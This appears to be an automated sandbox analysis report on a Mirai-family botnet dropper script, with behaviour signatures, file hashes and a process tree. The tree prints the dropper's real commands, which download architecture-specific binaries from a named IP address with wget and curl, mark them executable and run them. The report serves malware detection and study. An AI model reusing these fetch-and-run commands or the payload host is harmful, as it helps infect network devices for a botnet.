Analysis

  • max time kernel
    122s
  • max time network
    151s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240729-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    14-12-2024 03:03

General

  • Target

    2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc.sh

  • Size

    2KB

  • MD5

    624b68623e669355734d1149ffd5d430

  • SHA1

    ce07fb83638c8fa2865aa2b3d007c35902f7d96a

  • SHA256

    2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc

  • SHA512

    143e96f06f585f9b6702e9e33497936b5c7b2675a8e0f9aaa3b93289926491ad7e6e204b114a7ca5c09d4bbd44cf2b2b005801ca31338b10d8cbbe9301c4bb23

Malware Config

Extracted

Family

mirai

Botnet

UNST

Extracted

Family

mirai

Botnet

UNST

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Mirai family
  • Contacts a large (53107) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification 1 TTPs 10 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 10 IoCs
  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Enumerates active TCP sockets 1 TTPs 1 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Reads system network configuration 1 TTPs 1 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

  • Reads runtime system information 53 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 20 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc.sh
    /tmp/2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc.sh
    1⤵
    • Writes file to tmp directory
    PID:725
    • /usr/bin/wget
      wget http://15.228.54.104/beastmode/b3astmode.x86
      2⤵
      • Writes file to tmp directory
      PID:728
    • /usr/bin/curl
      curl -O http://15.228.54.104/beastmode/b3astmode.x86
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:752
    • /bin/cat
      cat b3astmode.x86
      2⤵
        PID:755
      • /bin/chmod
        chmod +x 2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc.sh B3ASTM0DE b3astmode.x86 systemd-private-e61d407d754a4af0ac14a87560048ea9-systemd-timedated.service-wb60dg
        2⤵
        • File and Directory Permissions Modification
        PID:756
      • /tmp/B3ASTM0DE
        ./B3ASTM0DE
        2⤵
        • Executes dropped EXE
        PID:757
      • /usr/bin/wget
        wget http://15.228.54.104/beastmode/b3astmode.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:759
      • /usr/bin/curl
        curl -O http://15.228.54.104/beastmode/b3astmode.mips
        2⤵
        • Reads runtime system information
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:760
      • /bin/cat
        cat b3astmode.mips
        2⤵
        • System Network Configuration Discovery
        PID:763
      • /bin/chmod
        chmod +x 2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc.sh B3ASTM0DE b3astmode.mips b3astmode.x86 systemd-private-e61d407d754a4af0ac14a87560048ea9-systemd-timedated.service-wb60dg
        2⤵
        • File and Directory Permissions Modification
        PID:764
      • /tmp/B3ASTM0DE
        ./B3ASTM0DE
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Enumerates active TCP sockets
        • Reads system network configuration
        • Reads runtime system information
        PID:766
      • /usr/bin/wget
        wget http://15.228.54.104/beastmode/b3astmode.mpsl
        2⤵
        • Writes file to tmp directory
        PID:775
      • /usr/bin/curl
        curl -O http://15.228.54.104/beastmode/b3astmode.mpsl
        2⤵
        • Reads runtime system information
        • Writes file to tmp directory
        PID:793
      • /bin/cat
        cat b3astmode.mpsl
        2⤵
          PID:810
        • /bin/chmod
          chmod +x 2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc.sh B3ASTM0DE b3astmode.mips b3astmode.mpsl b3astmode.x86 systemd-private-e61d407d754a4af0ac14a87560048ea9-systemd-timedated.service-wb60dg
          2⤵
          • File and Directory Permissions Modification
          PID:811
        • /tmp/B3ASTM0DE
          ./B3ASTM0DE
          2⤵
          • Executes dropped EXE
          PID:812
        • /usr/bin/wget
          wget http://15.228.54.104/beastmode/b3astmode.arm4
          2⤵
            PID:816
          • /usr/bin/curl
            curl -O http://15.228.54.104/beastmode/b3astmode.arm4
            2⤵
            • Reads runtime system information
            • Writes file to tmp directory
            PID:828
          • /bin/cat
            cat b3astmode.arm4
            2⤵
              PID:829
            • /bin/chmod
              chmod +x 2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc.sh B3ASTM0DE b3astmode.arm4 b3astmode.mips b3astmode.mpsl b3astmode.x86 systemd-private-e61d407d754a4af0ac14a87560048ea9-systemd-timedated.service-wb60dg
              2⤵
              • File and Directory Permissions Modification
              PID:830
            • /tmp/B3ASTM0DE
              ./B3ASTM0DE
              2⤵
              • Executes dropped EXE
              PID:831
            • /usr/bin/wget
              wget http://15.228.54.104/beastmode/b3astmode.arm5
              2⤵
              • Writes file to tmp directory
              PID:832
            • /usr/bin/curl
              curl -O http://15.228.54.104/beastmode/b3astmode.arm5
              2⤵
              • Reads runtime system information
              • Writes file to tmp directory
              PID:833
            • /bin/cat
              cat b3astmode.arm5
              2⤵
                PID:841
              • /bin/chmod
                chmod +x 2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc.sh B3ASTM0DE b3astmode.arm4 b3astmode.arm5 b3astmode.mips b3astmode.mpsl b3astmode.x86 systemd-private-e61d407d754a4af0ac14a87560048ea9-systemd-timedated.service-wb60dg
                2⤵
                • File and Directory Permissions Modification
                PID:842
              • /tmp/B3ASTM0DE
                ./B3ASTM0DE
                2⤵
                • Executes dropped EXE
                PID:844
              • /usr/bin/wget
                wget http://15.228.54.104/beastmode/b3astmode.arm6
                2⤵
                • Writes file to tmp directory
                PID:847
              • /usr/bin/curl
                curl -O http://15.228.54.104/beastmode/b3astmode.arm6
                2⤵
                • Reads runtime system information
                • Writes file to tmp directory
                PID:859
              • /bin/cat
                cat b3astmode.arm6
                2⤵
                  PID:870
                • /bin/chmod
                  chmod +x 2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc.sh B3ASTM0DE b3astmode.arm4 b3astmode.arm5 b3astmode.arm6 b3astmode.mips b3astmode.mpsl b3astmode.x86 systemd-private-e61d407d754a4af0ac14a87560048ea9-systemd-timedated.service-wb60dg
                  2⤵
                  • File and Directory Permissions Modification
                  PID:871
                • /tmp/B3ASTM0DE
                  ./B3ASTM0DE
                  2⤵
                  • Executes dropped EXE
                  PID:872
                • /usr/bin/wget
                  wget http://15.228.54.104/beastmode/b3astmode.arm7
                  2⤵
                  • Writes file to tmp directory
                  PID:874
                • /usr/bin/curl
                  curl -O http://15.228.54.104/beastmode/b3astmode.arm7
                  2⤵
                  • Reads runtime system information
                  • Writes file to tmp directory
                  PID:875
                • /bin/cat
                  cat b3astmode.arm7
                  2⤵
                    PID:876
                  • /bin/chmod
                    chmod +x 2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc.sh B3ASTM0DE b3astmode.arm4 b3astmode.arm5 b3astmode.arm6 b3astmode.arm7 b3astmode.mips b3astmode.mpsl b3astmode.x86 systemd-private-e61d407d754a4af0ac14a87560048ea9-systemd-timedated.service-wb60dg
                    2⤵
                    • File and Directory Permissions Modification
                    PID:877
                  • /tmp/B3ASTM0DE
                    ./B3ASTM0DE
                    2⤵
                    • Executes dropped EXE
                    PID:878
                  • /usr/bin/wget
                    wget http://15.228.54.104/beastmode/b3astmode.ppc
                    2⤵
                    • Writes file to tmp directory
                    PID:880
                  • /usr/bin/curl
                    curl -O http://15.228.54.104/beastmode/b3astmode.ppc
                    2⤵
                    • Reads runtime system information
                    • Writes file to tmp directory
                    PID:881
                  • /bin/cat
                    cat b3astmode.ppc
                    2⤵
                      PID:882
                    • /bin/chmod
                      chmod +x 2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc.sh B3ASTM0DE b3astmode.arm4 b3astmode.arm5 b3astmode.arm6 b3astmode.arm7 b3astmode.mips b3astmode.mpsl b3astmode.ppc b3astmode.x86 systemd-private-e61d407d754a4af0ac14a87560048ea9-systemd-timedated.service-wb60dg
                      2⤵
                      • File and Directory Permissions Modification
                      PID:883
                    • /tmp/B3ASTM0DE
                      ./B3ASTM0DE
                      2⤵
                      • Executes dropped EXE
                      PID:884
                    • /usr/bin/wget
                      wget http://15.228.54.104/beastmode/b3astmode.m68k
                      2⤵
                      • Writes file to tmp directory
                      PID:886
                    • /usr/bin/curl
                      curl -O http://15.228.54.104/beastmode/b3astmode.m68k
                      2⤵
                      • Reads runtime system information
                      • Writes file to tmp directory
                      PID:887
                    • /bin/cat
                      cat b3astmode.m68k
                      2⤵
                        PID:888
                      • /bin/chmod
                        chmod +x 2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc.sh B3ASTM0DE b3astmode.arm4 b3astmode.arm5 b3astmode.arm6 b3astmode.arm7 b3astmode.m68k b3astmode.mips b3astmode.mpsl b3astmode.ppc b3astmode.x86 systemd-private-e61d407d754a4af0ac14a87560048ea9-systemd-timedated.service-wb60dg
                        2⤵
                        • File and Directory Permissions Modification
                        PID:889
                      • /tmp/B3ASTM0DE
                        ./B3ASTM0DE
                        2⤵
                        • Executes dropped EXE
                        PID:890
                      • /usr/bin/wget
                        wget http://15.228.54.104/beastmode/b3astmode.sh4
                        2⤵
                        • Writes file to tmp directory
                        PID:892
                      • /usr/bin/curl
                        curl -O http://15.228.54.104/beastmode/b3astmode.sh4
                        2⤵
                        • Reads runtime system information
                        • Writes file to tmp directory
                        PID:896
                      • /bin/cat
                        cat b3astmode.sh4
                        2⤵
                          PID:897
                        • /bin/chmod
                          chmod +x 2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc.sh B3ASTM0DE b3astmode.arm4 b3astmode.arm5 b3astmode.arm6 b3astmode.arm7 b3astmode.m68k b3astmode.mips b3astmode.mpsl b3astmode.ppc b3astmode.sh4 b3astmode.x86
                          2⤵
                          • File and Directory Permissions Modification
                          PID:898
                        • /tmp/B3ASTM0DE
                          ./B3ASTM0DE
                          2⤵
                          • Executes dropped EXE
                          PID:899

                      Network

                      MITRE ATT&CK Enterprise v15

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • /tmp/B3ASTM0DE

                        Filesize

                        23KB

                        MD5

                        6fdcdf8e1a1d76e45fa874a20a18b804

                        SHA1

                        8f8253e997ac2997a16e3a189f441d30d9a7675c

                        SHA256

                        f7596984321fc1661a09c06d7da23513d21ab87ce7d3b2fed655ee1815288057

                        SHA512

                        d9e44d922034cde7f8504d603326c58d3e3a37e3362384e8c528430421839ffcac379711172da673e734d01e7c26e81ef97b6ebb0d1245f690639622c89834bc

                      • /tmp/B3ASTM0DE

                        Filesize

                        24KB

                        MD5

                        8e2bc890571386d49be504c19d6ae5f4

                        SHA1

                        ec10343c39481e9867cab49607feb8351baa17dd

                        SHA256

                        e5baf9cce449b61fe75c5bc6ceb2c0f82d4849d0827148bd33a6a1fb8f4b98a2

                        SHA512

                        75b232d0f4c28b33ec01f0c27bd4e73ddb17d007b6531a63266e08f32c6a8fbe1811aa7570c874c298a117edf31c2f2e191b35d628c65eed45ad723c718db4af

                      • /tmp/B3ASTM0DE

                        Filesize

                        275B

                        MD5

                        8a052866f3090135b18f374ce1049566

                        SHA1

                        cc858d4367e62558a09416f9521c159ec02ce42f

                        SHA256

                        efb22cd5a845c646f8c7516e4d0936eca928b961da2d866a75aa4b2626fb6120

                        SHA512

                        0b8541f9fa9dce7430684e0c788f798667bba45373c66436226a04e32494a3b62520b8289ce49001009e429153aa2c27c8e4cd794c59f6eef65ab0aa818a9d16

                      • /tmp/B3ASTM0DE

                        Filesize

                        49KB

                        MD5

                        d585800f95f4f716d9faf633ebaa9433

                        SHA1

                        ddf0a2bf2db94565ff0195178c35464c461bba26

                        SHA256

                        ff3b43f66762a8b39fe29e4a99079f6086a9963015140775aa3ac5fe427ec558

                        SHA512

                        af4c64a694d237e9994abaae75a5444050bbf87726b0d0025bdbcc94ce307b785ff93d79504069b390e51583db7fbc1735d164254bc3822b33154b96f6b94122

                      • /tmp/B3ASTM0DE

                        Filesize

                        50KB

                        MD5

                        1eb79986e143c1056ba849622066314a

                        SHA1

                        8e3f6732545066ea8437a0fea031ac48d3fb91ac

                        SHA256

                        584deb400df62226321615bf2e15538cd3483d0effea114df211395f7d4e3e49

                        SHA512

                        57c1ee3f81f78d767163d1834d061e36bdf3f8fbd359c73522e5e51c8887a92b2a12c65636cdc49e2974246e24bd944030d6d91083776f62e53018dacf850d3e

                      • /tmp/b3astmode.x86

                        Filesize

                        22KB

                        MD5

                        873c6ba01596fdbb9c469fe1e0180243

                        SHA1

                        9236be2f17ba4d7422bf8f579d95c6226d3eaa48

                        SHA256

                        9959896b86d7dcb455c0f9d61ba74b19a3dc638ad08b51c4038ea5f092846170

                        SHA512

                        f218dc4f64b089abae03e2c996d016e71021cb353d35c034db147b4b083453085ee74273d119dc6e7440b5ccad2e00acaada435a10910a6af4a92f071a0ed1ee